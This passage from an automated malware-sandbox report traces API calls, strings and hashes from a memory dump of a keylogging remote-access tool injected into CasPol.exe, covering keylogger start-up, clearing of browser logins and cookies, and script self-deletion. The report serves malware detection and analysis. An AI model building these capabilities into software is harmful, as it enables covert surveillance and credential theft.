                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                                              • String ID: Online Keylogger Started
                                                                              • API String ID: 112202259-1258561607
                                                                              • Opcode ID: cb4b4d00bd1f48587d0ff016746fdd274eca288aaf42b5913708234c7b45ab26
                                                                              • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                              • Opcode Fuzzy Hash: cb4b4d00bd1f48587d0ff016746fdd274eca288aaf42b5913708234c7b45ab26
                                                                              • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                              • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                              • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                              • String ID: `@
                                                                              • API String ID: 2583163307-951712118
                                                                              • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                              • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                              • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                              • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                              • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                              • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEventHandleObjectSingleWait
                                                                              • String ID: Connection Timeout
                                                                              • API String ID: 2055531096-499159329
                                                                              • Opcode ID: 6ad77e449ea0c8f5081632a4e06be94507840fe6c7293467847821b6de829208
                                                                              • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                              • Opcode Fuzzy Hash: 6ad77e449ea0c8f5081632a4e06be94507840fe6c7293467847821b6de829208
                                                                              • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                              • String ID: bad locale name
                                                                              • API String ID: 3628047217-1405518554
                                                                              • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                              • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                              • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                              • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                              APIs
                                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExecuteShell
                                                                              • String ID: /C $cmd.exe$open
                                                                              • API String ID: 587946157-3896048727
                                                                              • Opcode ID: 7d804f516a62bf7a6255b3e0914bf23257692c2765e93924c49a27dcea95556c
                                                                              • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                              • Opcode Fuzzy Hash: 7d804f516a62bf7a6255b3e0914bf23257692c2765e93924c49a27dcea95556c
                                                                              • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                              APIs
                                                                              • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                              • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                              • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: TerminateThread$HookUnhookWindows
                                                                              • String ID: pth_unenc
                                                                              • API String ID: 3123878439-4028850238
                                                                              • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                              • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                              • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                              • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: GetCursorInfo$User32.dll
                                                                              • API String ID: 1646373207-2714051624
                                                                              • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                              • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                              • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                              • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetLastInputInfo$User32.dll
                                                                              • API String ID: 2574300362-1519888992
                                                                              • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                              • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                              • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                              • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __alldvrm$_strrchr
                                                                              • String ID:
                                                                              • API String ID: 1036877536-0
                                                                              • Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                              • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                              • Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                              • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                              • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                              • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                              • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3360349984-0
                                                                              • Opcode ID: b29a8bcc01a21f7fe38ddc3438b80264c3974fc0b274f3a4a7c26760eb770a85
                                                                              • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                              • Opcode Fuzzy Hash: b29a8bcc01a21f7fe38ddc3438b80264c3974fc0b274f3a4a7c26760eb770a85
                                                                              • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                              APIs
                                                                              Strings
                                                                              • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                              • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                              • API String ID: 3472027048-1236744412
                                                                              • Opcode ID: f67da73cb2a02539f4d7dbc2d65eb95b4f98d554b542dc907f6a3b7988cd3d28
                                                                              • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                              • Opcode Fuzzy Hash: f67da73cb2a02539f4d7dbc2d65eb95b4f98d554b542dc907f6a3b7988cd3d28
                                                                              • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                              APIs
                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                              • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQuerySleepValue
                                                                              • String ID: @CG$exepath$BG
                                                                              • API String ID: 4119054056-3221201242
                                                                              • Opcode ID: 4b5d4860d097bb15903a365519ba02cddbdb2c7d02e23e68ccb2f20ada22baa5
                                                                              • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                              • Opcode Fuzzy Hash: 4b5d4860d097bb15903a365519ba02cddbdb2c7d02e23e68ccb2f20ada22baa5
                                                                              • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                              APIs
                                                                                • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                              • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                              • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$SleepText$ForegroundLength
                                                                              • String ID: [ $ ]
                                                                              • API String ID: 3309952895-93608704
                                                                              • Opcode ID: 7d648279a39037f0c5f174499f798c92f938224ad1328bcf7918cf7612db1a1c
                                                                              • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                              • Opcode Fuzzy Hash: 7d648279a39037f0c5f174499f798c92f938224ad1328bcf7918cf7612db1a1c
                                                                              • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandlePointerWrite
                                                                              • String ID:
                                                                              • API String ID: 3604237281-0
                                                                              • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                              • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                              • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                              • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                              • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                              • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                              • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                              • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                              • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                              • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                              APIs
                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                              • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                              • String ID:
                                                                              • API String ID: 737400349-0
                                                                              • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                              • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                              • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                              • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                              • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 3177248105-0
                                                                              • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                              • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                              • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                              • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                              • String ID:
                                                                              • API String ID: 3919263394-0
                                                                              • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                              • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                              • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                              • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                              • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                              • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                              • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 4116985748-0
                                                                              • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                              • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                              • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                              • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandleOpenProcess
                                                                              • String ID:
                                                                              • API String ID: 39102293-0
                                                                              • Opcode ID: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                                                                              • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                              • Opcode Fuzzy Hash: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                                                                              • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorHandling__start
                                                                              • String ID: pow
                                                                              • API String ID: 3213639722-2276729525
                                                                              • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                              • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                              • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                              • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountEventTick
                                                                              • String ID: >G
                                                                              • API String ID: 180926312-1296849874
                                                                              • Opcode ID: 1007d5987cb89b47bcb37258dfb74b1a4b1670e81c642732b6968468e9dc04a3
                                                                              • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                              • Opcode Fuzzy Hash: 1007d5987cb89b47bcb37258dfb74b1a4b1670e81c642732b6968468e9dc04a3
                                                                              • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Info
                                                                              • String ID: $fD
                                                                              • API String ID: 1807457897-3092946448
                                                                              • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                              • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                              • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                              • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                              APIs
                                                                              • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509B9
                                                                              Strings
                                                                              Memory Dump Source
